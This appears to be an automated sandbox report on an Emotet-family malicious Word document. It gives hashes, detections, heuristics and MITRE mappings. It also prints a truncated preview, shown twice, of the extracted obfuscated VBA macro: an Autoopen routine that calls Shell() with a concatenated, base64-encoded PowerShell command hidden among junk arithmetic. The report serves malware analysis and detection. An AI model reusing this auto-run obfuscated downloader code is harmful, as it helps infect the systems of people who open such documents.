Emotet Office (OLE) malware analysis — malicious · 073e6c82d6ebf587

MALICIOUS

Office (OLE)

94.2 KB Created: 2018-06-12 13:37:00 Authoring application: Microsoft Office Word First seen: 2018-10-07

MD5: 9b072195ffa56d8475a6b7038bc88ea2 SHA-1: 3fdeb6e2f3aab8f85910b0497d574d00a604447e SHA-256: 073e6c82d6ebf58763a376e2e468ceb8a6b9cc2012c323ab44a6d4742490c070

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6968842-0', strongly suggesting the Emotet family. Critical heuristics indicate the presence of a VBA macro that uses the Shell() function, a common technique for executing downloaded payloads. The Autoopen macro is present and configured to execute the Shell() call, indicating an attempt to run malicious code upon opening the document.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6968842-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6968842-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12254 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12254 bytes
SHA-256: `2ecb1e479ce657fdee4be8f991d9e71ac208c9a63ee1219cdfe4a5a43b19782c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "OAUQcVspqS" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function XQQGSak() On Error Resume Next pjOwS = Tan(53231) fpGvh = TvtJB AdUtr = CDbl(UqEbWB) UcKpUN = BlJiG pfniAG = Hex(aMoVmX * ChrW(wlzDT + Int(FNdIF * Rnd(47943)) * cKPUmn * Log(86801 * oDaaP - PHopC + Fix(51)))) LaQlFO = Tan(1603) cBiYcK = Tan(33316) zTjwi = JhZdDw FpSDbk = CDbl(udPXm) imYCw = pwKUG SORiM = Hex(LCBWML * ChrW(AaPWT + Int(LMdRX * Rnd(18200)) * iwIru * Log(39397 * zJVkL - nLjzH + Fix(51)))) Mhwiac = Tan(82839) XQQGSak = Ziwhlo + Shell(fsEdluNrWP + Chr(buMKLB + vbKeyP + vIbnYiC) + "owers" + ctMWwcAw + zSIzHvcabs + kXMfsZUpSCE + fWQlnFBmz + pwqTmuLcj, 24722 - 24722) urpzt = Tan(47904) zMuJbs = VrFiKC zciKz = CDbl(pjUhPD) SITYq = bpzppf NLHZvS = Hex(zuOLmw * ChrW(zRsMuX + Int(hNXjoX * Rnd(51351)) * AnoiPj * Log(58447 * vmwPD - tIltK + Fix(51)))) YGcvIt = Tan(62410) End Function Sub Autoopen() On Error Resume Next jsHvOY = Tan(88525) XIhsVs = azIkJU vuMwC = CDbl(KtWVCj) CiBBfd = kcMSG JCzzJX = Hex(TzNiPV * ChrW(RdmMp + Int(CuvwHE * Rnd(61209)) * iSius * Log(43633 * HvWMfD - FRSlK + Fix(51)))) AHqzcR = Tan(56761) XQQGSak GBrEr = Tan(50077) fioWwQ = iPzKk oidVuC = CDbl(XciSa) UBufIo = jamdPL qZaAS = Hex(wacXVJ * ChrW(XRDwWv + Int(wHnkr * Rnd(41316)) * AOrAG * Log(68700 * LwBiAt - tZXKzA + Fix(51)))) OWqHT = Tan(10624) End Sub Attribute VB_Name = "ilqJwavLk" Function ctMWwcAw() On Error Resume Next didNw = Tan(26441) BIURI = dpLQc Dpjon = CDbl(wVttw) uwFAE = clmnd JbXsYw = Hex(WauYi * ChrW(qpFzsQ + Int(KCWMG * Rnd(56832)) * mnrhQL * Log(64784 * MkGwua - rzYaCO + Fix(51)))) XnuXVo = Tan(13484) PvBzkzinz = "HeLL -e " + "LgAoACAAJ" + "ABwAFMAaAB" + "vAG0" + "AZQBbADIAMQBdA" + "CsAJABwAFM" LmvNf = Tan(66818) NHTPLd = rvVhi XojaW = CDbl(QDmtq) XHYUBh = tImQHm GCwwC = Hex(FwhXGU * ChrW(cSfaOc + Int(nVwXu * Rnd(76830)) * oBkXYo * Log(37184 * NHorCn - ZBNjqS + Fix(51)))) dMCiQP = Tan(69391) XuTcYsL = "AaABvAG0" + "AZQBbAD" + "MANABdACsAJwB" + "YACcAKQ" YEOBR = Tan(89288) zhjXfE = mXajM uJNzUO = CDbl(YVuYE) HijcB = jcBjA nWEZi = Hex(hCnLO * ChrW(QhCVYi + Int(ITSwqC * Rnd(89491)) * MfUsc * Log(23987 * jsUwqq - BZwTsM + Fix(51)))) TLDXt = Tan(85985) OVabNm = "AoA" + "CAATgBlAH" + "cALQBPAEIAS" + "gBlAGMAVAAgAH" + "MAeQBzAHQ" + "ARQBtAC4ASQB" + "vAC4AUwBU" + "AHIAZQBhAG0AUgB" + "FAEEARABlAHIA" + "KAAgACg" VZOXki = Tan(39115) TSlik = KBaow SsAWJ = CDbl(FtUQVj) jLSFa = LWiGi ObTIJc = Hex(zbjcZr * ChrW(CZbCC + Int(CKDosv * Rnd(99490)) * kunmVo * Log(91170 * mkKom - sAjsNM + Fix(51)))) mvbDh = Tan(59310) SHcStAjzNPB = "AIABOAGUAd" + "wAtA" + "E8AQ" + "gBKAGUAY" + "wBUACAAI" + "ABJAG8A" + "LgBjAG8AT" + "QB" + "wAFIARQBzA" XiQNd = Tan(1316) hsqDC = vnqrO QSDFz = CDbl(niwzMi) KsiHTz = mZLIs LtHzEk = Hex(XNkUYR * ChrW(pWNhjH + Int(saNfW * Rnd(89269)) * XrHuM * Log(19487 * tWzub - QwHOiC + Fix(51)))) VPLdc = Tan(70821) zzBIXZYG = "FMASQBvAG4AL" + "gB" + "EAEUARgBMAEE" + "AdABlAFMAd" + "ABSAEUAYQBtACgA" + "IABbAHMAW" + "QBz" + "AHQARQBtAC4A" STuTh = Tan(80740) zWdZLG = wzOnE zwTww = CDbl(diHfi) ckEab = MlFQZi XvHYQw = Hex(XVaVAv * ChrW(NMEsq + Int(HjWFWX * Rnd(68059)) * SJiXoK * Log(48645 * VJrjo - GKiajI + Fix(51)))) ZBYifj = Tan(75988) jfXIl = "aQBvAC4" + "Ab" + "QB" + "FAG0ATwByA" + "HkA" + "UwB0" + "AFIAZQ" + "BhAG" + "0AXQAgAF" ctMWwcAw = PvBzkzinz + XuTcYsL + OVabNm + SHcStAjzNPB + zzBIXZYG + jfXIl End Function Function zSIzHvcabs() On Error Resume Next CCtNP = Tan(9250) rwLlw = qvAHKM MWwrbb = CDbl(IKoJdl) THwVZp = SjOvKJ GXbUTK = Hex(fFBmn * ChrW(ChKCH + Int(qXnCm * Rnd(71416)) * htnhw * Log(33236 * LCmNo - blnBw + Fix(51)))) mislYM = Tan(76581) iotdcLiSF = "sAQ" + "wBPAE4AVg" + "BFAFIAdABdADo" + "AOgBGAF" + "IAbwBtAGIAYQBTA" + "EUANgA0AFMAVABy" + "AGkATgBnAC" + "gAJwBWAFoAQgB2A" + "FMAOABN" + "AHcAR" TKSVpj = Tan(94193) TsXFUV = AuzOzl jlGCw = CD ... (truncated)

SHA-256: 2ecb1e479ce657fdee4be8f991d9e71ac208c9a63ee1219cdfe4a5a43b19782c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "OAUQcVspqS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function XQQGSak()
On Error Resume Next
pjOwS = Tan(53231)
fpGvh = TvtJB
AdUtr = CDbl(UqEbWB)
UcKpUN = BlJiG
pfniAG = Hex(aMoVmX * ChrW(wlzDT + Int(FNdIF * Rnd(47943)) * cKPUmn * Log(86801 * oDaaP - PHopC + Fix(51))))
LaQlFO = Tan(1603)
cBiYcK = Tan(33316)
zTjwi = JhZdDw
FpSDbk = CDbl(udPXm)
imYCw = pwKUG
SORiM = Hex(LCBWML * ChrW(AaPWT + Int(LMdRX * Rnd(18200)) * iwIru * Log(39397 * zJVkL - nLjzH + Fix(51))))
Mhwiac = Tan(82839)
XQQGSak = Ziwhlo + Shell(fsEdluNrWP + Chr(buMKLB + vbKeyP + vIbnYiC) + "owers" + ctMWwcAw + zSIzHvcabs + kXMfsZUpSCE + fWQlnFBmz + pwqTmuLcj, 24722 - 24722)
urpzt = Tan(47904)
zMuJbs = VrFiKC
zciKz = CDbl(pjUhPD)
SITYq = bpzppf
NLHZvS = Hex(zuOLmw * ChrW(zRsMuX + Int(hNXjoX * Rnd(51351)) * AnoiPj * Log(58447 * vmwPD - tIltK + Fix(51))))
YGcvIt = Tan(62410)
End Function
Sub Autoopen()
On Error Resume Next
jsHvOY = Tan(88525)
XIhsVs = azIkJU
vuMwC = CDbl(KtWVCj)
CiBBfd = kcMSG
JCzzJX = Hex(TzNiPV * ChrW(RdmMp + Int(CuvwHE * Rnd(61209)) * iSius * Log(43633 * HvWMfD - FRSlK + Fix(51))))
AHqzcR = Tan(56761)
XQQGSak
GBrEr = Tan(50077)
fioWwQ = iPzKk
oidVuC = CDbl(XciSa)
UBufIo = jamdPL
qZaAS = Hex(wacXVJ * ChrW(XRDwWv + Int(wHnkr * Rnd(41316)) * AOrAG * Log(68700 * LwBiAt - tZXKzA + Fix(51))))
OWqHT = Tan(10624)
End Sub


Attribute VB_Name = "ilqJwavLk"
Function ctMWwcAw()
On Error Resume Next
didNw = Tan(26441)
BIURI = dpLQc
Dpjon = CDbl(wVttw)
uwFAE = clmnd
JbXsYw = Hex(WauYi * ChrW(qpFzsQ + Int(KCWMG * Rnd(56832)) * mnrhQL * Log(64784 * MkGwua - rzYaCO + Fix(51))))
XnuXVo = Tan(13484)
PvBzkzinz = "HeLL -e " + "LgAoACAAJ" + "ABwAFMAaAB" + "vAG0" + "AZQBbADIAMQBdA" + "CsAJABwAFM"
LmvNf = Tan(66818)
NHTPLd = rvVhi
XojaW = CDbl(QDmtq)
XHYUBh = tImQHm
GCwwC = Hex(FwhXGU * ChrW(cSfaOc + Int(nVwXu * Rnd(76830)) * oBkXYo * Log(37184 * NHorCn - ZBNjqS + Fix(51))))
dMCiQP = Tan(69391)
XuTcYsL = "AaABvAG0" + "AZQBbAD" + "MANABdACsAJwB" + "YACcAKQ"
YEOBR = Tan(89288)
zhjXfE = mXajM
uJNzUO = CDbl(YVuYE)
HijcB = jcBjA
nWEZi = Hex(hCnLO * ChrW(QhCVYi + Int(ITSwqC * Rnd(89491)) * MfUsc * Log(23987 * jsUwqq - BZwTsM + Fix(51))))
TLDXt = Tan(85985)
OVabNm = "AoA" + "CAATgBlAH" + "cALQBPAEIAS" + "gBlAGMAVAAgAH" + "MAeQBzAHQ" + "ARQBtAC4ASQB" + "vAC4AUwBU" + "AHIAZQBhAG0AUgB" + "FAEEARABlAHIA" + "KAAgACg"
VZOXki = Tan(39115)
TSlik = KBaow
SsAWJ = CDbl(FtUQVj)
jLSFa = LWiGi
ObTIJc = Hex(zbjcZr * ChrW(CZbCC + Int(CKDosv * Rnd(99490)) * kunmVo * Log(91170 * mkKom - sAjsNM + Fix(51))))
mvbDh = Tan(59310)
SHcStAjzNPB = "AIABOAGUAd" + "wAtA" + "E8AQ" + "gBKAGUAY" + "wBUACAAI" + "ABJAG8A" + "LgBjAG8AT" + "QB" + "wAFIARQBzA"
XiQNd = Tan(1316)
hsqDC = vnqrO
QSDFz = CDbl(niwzMi)
KsiHTz = mZLIs
LtHzEk = Hex(XNkUYR * ChrW(pWNhjH + Int(saNfW * Rnd(89269)) * XrHuM * Log(19487 * tWzub - QwHOiC + Fix(51))))
VPLdc = Tan(70821)
zzBIXZYG = "FMASQBvAG4AL" + "gB" + "EAEUARgBMAEE" + "AdABlAFMAd" + "ABSAEUAYQBtACgA" + "IABbAHMAW" + "QBz" + "AHQARQBtAC4A"
STuTh = Tan(80740)
zWdZLG = wzOnE
zwTww = CDbl(diHfi)
ckEab = MlFQZi
XvHYQw = Hex(XVaVAv * ChrW(NMEsq + Int(HjWFWX * Rnd(68059)) * SJiXoK * Log(48645 * VJrjo - GKiajI + Fix(51))))
ZBYifj = Tan(75988)
jfXIl = "aQBvAC4" + "Ab" + "QB" + "FAG0ATwByA" + "HkA" + "UwB0" + "AFIAZQ" + "BhAG" + "0AXQAgAF"
ctMWwcAw = PvBzkzinz + XuTcYsL + OVabNm + SHcStAjzNPB + zzBIXZYG + jfXIl
End Function
Function zSIzHvcabs()
On Error Resume Next
CCtNP = Tan(9250)
rwLlw = qvAHKM
MWwrbb = CDbl(IKoJdl)
THwVZp = SjOvKJ
GXbUTK = Hex(fFBmn * ChrW(ChKCH + Int(qXnCm * Rnd(71416)) * htnhw * Log(33236 * LCmNo - blnBw + Fix(51))))
mislYM = Tan(76581)
iotdcLiSF = "sAQ" + "wBPAE4AVg" + "BFAFIAdABdADo" + "AOgBGAF" + "IAbwBtAGIAYQBTA" + "EUANgA0AFMAVABy" + "AGkATgBnAC" + "gAJwBWAFoAQgB2A" + "FMAOABN" + "AHcAR"
TKSVpj = Tan(94193)
TsXFUV = AuzOzl
jlGCw = CD
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.